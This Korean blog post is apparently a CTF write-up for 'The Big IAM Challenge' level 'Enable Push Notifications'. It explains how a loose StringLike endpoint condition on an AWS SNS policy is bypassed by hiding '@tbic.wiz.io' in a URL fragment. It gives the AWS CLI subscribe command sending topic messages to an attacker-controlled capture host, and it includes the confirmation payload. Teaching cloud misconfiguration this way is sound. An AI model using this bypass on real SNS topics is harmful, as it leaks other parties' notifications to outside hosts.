Enable Push Notifications 문제
설명
We got a message for you. Can you get it?
IAM Policy
{
"Version": "2008-10-17",
"Id": "Statement1",
"Statement": [
{
"Sid": "Statement1",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Subscribe",
"Resource": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
"Condition": {
"StringLike": {
"sns:Endpoint": "*@tbic.wiz.io"
}
}
}
]
}풀이
이번 문제는 "TBICWizPushNotifications" SNS의 구독 기능을 *@tbic.wiz.io로 끝나는 Endpoint에서만 수행할 수 있음
그런데 StringLike 조건이 마지막에 @tbic.wiz.io가 포함되는지 확인하는 것이 전부였기 때문에 다른 Protocol로 쉽게 우회가 가능하였음
dreamhack-tools
tools.dreamhack.games
https Protocol을 사용하였으며, Fragments(#)에 @tbic.wiz.io가 포함되도록 함으로써 공격자의 서버로 구독 메일이 전달되어 구독을 성공적으로 수행할 수 있었고 이를 통해 Flag를 전달 받을 수 있었음
PoC
1. https Protocol을 이용하여 구독 메일이 전달되도록 AWS CLI 실행
> aws sns subscribe --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --protocol https --notification-endpoint "https://gozqoty.request.dreamhack.games/#?a=@tbic.wiz.io"
2. 전달 받은 메일 내에 있는 SubscribeURL 접속
{
"Type": "SubscriptionConfirmation",
"MessageId": "b32585a1-7c31-4130-8601-dc8184f93c0d",
"Token": "2336412f37fb687f5d51e6e2425c464de257ebdb8c0ad2abda47f308980310185e729f657889840f57d8c90a3fb67359009e5319c98d337f477d6dfe57c5153d7f77e5931d8c6838ae14b7681908815ea108274d051eaa8e79c01041f8fd224f4e6b9feef1492c50c053d56931a55047790f36561666670be883c8188db442e5",
"TopicArn": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
"Message": "You have chosen to subscribe to the topic arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications.\nTo confirm the subscription, visit the SubscribeURL included in this message.",
"SubscribeURL": "https://sns.us-east-1.amazonaws.com/?Action=ConfirmSubscription&TopicArn=arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications&Token=2336412f37fb687f5d51e6e2425c464de257ebdb8c0ad2abda47f308980310185e729f657889840f57d8c90a3fb67359009e5319c98d337f477d6dfe57c5153d7f77e5931d8c6838ae14b7681908815ea108274d051eaa8e79c01041f8fd224f4e6b9feef1492c50c053d56931a55047790f36561666670be883c8188db442e5",
"Timestamp": "2023-07-09T10:07:44.822Z",
"SignatureVersion": "1",
"Signature": "IMQquy3yhPu76DMPbX9JTzkGYSQixjMD5d9SbgRYlowrwO7MNDRAW6oxPIjqK8hoKo5BOKQz05x9+Z9ekBEJIxA3oXJN68LWJDuDoipCG2ckrP6AQes9uDKrkZykM5sN0R0DUo+aV8RUjFHDPGOlTREVa7rPxlXDQDYzgG5AkqmlJmGDX48WH52YRH7jxfFAn1WF8o1nBrd3duXZc9aSSnVSYU6yMkWysN8lZYxjduao3cvFQtUBjyxYylJlK5miOASIc5HDpyTcYWGPogJs1avTD/2Mj9hhBl4GPr+LfIDqIPl+Yca3NBCG61iFuuAg8Et5GX9LDDxs4LoT0Vk5IA==",
"SigningCertURL": "https://sns.us-east-1.amazonaws.com/SimpleNotificationService-01d088a6f77103d0fe307c0069e40ed6.pem"
}
3. 이후 구독이 완료되어, Flag가 구독을 설정한 서버로 전달됨
Reference
subscribe — AWS CLI 1.29.1 Command Reference
Note: You are viewing the documentation for an older major version of the AWS CLI (version 1). AWS CLI version 2, the latest major version of AWS CLI, is now stable and recommended for general use. To view this page for the AWS CLI version 2, click here. F
docs.aws.amazon.com
'Hack > Cloud' 카테고리의 다른 글
| [The Big IAM Challenge] Do I know you? (0) | 2023.07.09 |
|---|---|
| [The Big IAM Challenge] Admin only? (0) | 2023.07.09 |
| [The Big IAM Challenge] Google Analytics (0) | 2023.07.09 |
| [The Big IAM Challenge] Buckets of Fun (0) | 2023.07.09 |
| AWS S3 Bucket 설정 시 주의해야 할 점 (0) | 2023.05.27 |
댓글